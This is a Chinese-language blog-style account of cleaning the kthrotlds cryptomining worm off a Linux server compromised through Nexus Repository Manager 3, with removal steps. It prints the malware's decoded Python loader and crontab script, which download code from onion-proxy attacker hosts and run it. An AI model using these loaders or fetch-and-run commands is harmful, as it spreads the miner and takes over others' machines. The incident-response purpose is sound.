linux服务器排查挖矿病毒kthroltlds的经过
服务器报病毒
查了种种资料,原来ThinkPHP和Supervisord和Nexus Repository Manager 3的产品旧版本有漏洞, 我就是装了maven nexus 3, 有漏洞被入侵了,这是变种病毒:kthroltlds
看看top任务栏有哪些可疑的地方:
ps -aux --sort=-pcpu|head -10得到:
python2直接exec执行base64字符串解码的代码。
将base64解码看看里面的内容:
#coding: utf-8
import base64
import urllib2
import ssl
HOST="https://an7kmd2wp4xo7hpr"
RPATH1="src/sc"
d1=HOST+".onion.pet/"+RPATH1
d2=HOST+".onion.ws/"+RPATH1
d3=HOST+".onion.ly/"+RPATH1
def ld(url, t):
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
except Exception:
ctx=False
if ctx:
page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())
else:
page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())
return page
try:
try:
page=ld(d1, 175)
exec(page)
except Exception:
page=ld(d2, 175)
exec(page)
except Exception:
page=ld(d3, 175)
exec(page)
pass追踪一下作恶的网站,看看:
https://an7kmd2wp4xo7hpr.onion.ws/src/sc
再看/etc/crontab,有异常计划
wget="wget ";
if [ "$(whoami)" = "root" ];
then if [ $(command -v curl|wc -l) -eq 0 ];
then curl=$(ls /usr/bin|grep -i url|head -n 1); fi;
if [ -z ${curl} ]; then curl="echo "; fi;
if [ $(command -v wget|wc -l) -eq 0 ];
then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi;
if [ -z ${wget} ]; then wget="echo "; fi;
if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;
fi;
${curl} -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp||
${curl} -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp||
${curl} -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.onion.market/src/ldm -o /root/.cache/.ntp||
${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /root/.cache/.ntp||
${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /root/.cache/.ntp||
${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.market/src/ldm -O /root/.cache/.ntp)
&& chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
而且还用Java Service Wrapper打包了两个系统服务cloudResetPwdAgent, CloudrResetPwdAgent
下面开始处理---------->>>
1. 先修改本地域名指向,避免访问
vim /etc/hosts
---将这个垃圾站禁止
-- onion.ws 指向本地
127.0.0.1 localhost onion.ws
2. 关闭异常进程
# 关闭异常进程
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'python2' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'CloudResetPwdUpdateAgent' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'CloudResetPwdAgent' | busybox awk '{print $1}' | busybox xargs kill -9
3. 清理定时任务crond和crontab
# 关闭crond服务
service crond stop
#删除计划任务配置(因为cron.d文件被加了i锁,需要先chattr解除掉)
chattr -i /etc/cron.d/root
busybox rm -f /etc/cron.d/root
chattr -i /var/spool/cron/root
busybox rm -f /var/spool/cron/root仔细检查以下文件是否还存在异常计划任务,有就删掉
/var/spool/cron/
/etc/crontab
/etc/cron.d
/etc/cron.daily
/etc/cron.houly
/etc/cron.mouthly
/etc/cron.weekly
4. 清理自启项cloudResetPwdAgent, CloudrResetPwdAgent
# 关闭自定义服务
service cloudResetPwdAgent stop
service CloudrResetPwdAgent stop
# 用chkconfig清理开机启动项
chkconfig cloudResetPwdAgent off
chkconfig --del cloudResetPwdAgent
chkconfig cloudResetPwdUpdateAgent off
chkconfig --del cloudResetPwdUpdateAgent
#删除自启动项配置
busybox rm -f /etc/init.d/cloudResetPwdAgent
busybox rm -f /etc/init.d/cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc0.d/K80cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc0.d/K80cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc1.d/K80cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc1.d/K80cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc2.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc2.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc3.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc3.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc4.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc4.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc5.d/S20cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc5.d/S20cloudResetPwdUpdateAgent
busybox rm -f /etc/rc.d/rc6.d/K80cloudResetPwdAgent
busybox rm -f /etc/rc.d/rc6.d/K80cloudResetPwdUpdateAgent
5.再次确认进程是否存在
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
OK, 清理干净了!! 重启cron
service crond start
参考文档:
1. 关于Linux下变种DDG挖矿应急处理心得
https://www.tuicool.com/articles/U3UBjeN
2.对于Watchdogs变种为kthrotlds又变种为kpsmouseds的挖矿蠕虫病毒清理
https://www.jianshu.com/p/9f24ade3f462
3.Linux之在CentOS上一次艰难的木马查杀过程
https://www.dwhd.org/20150908_191437.html?mType=Group
4. Nexus Repository Manager 3 远程代码执行漏洞 (CVE-2019-7238) 分析及利用
http://521.li/post/107.html
5. 威胁预警 | Nexus Repository Manager三个新漏洞已被用于挖矿木马传播
https://www.freebuf.com/vuls/197200.html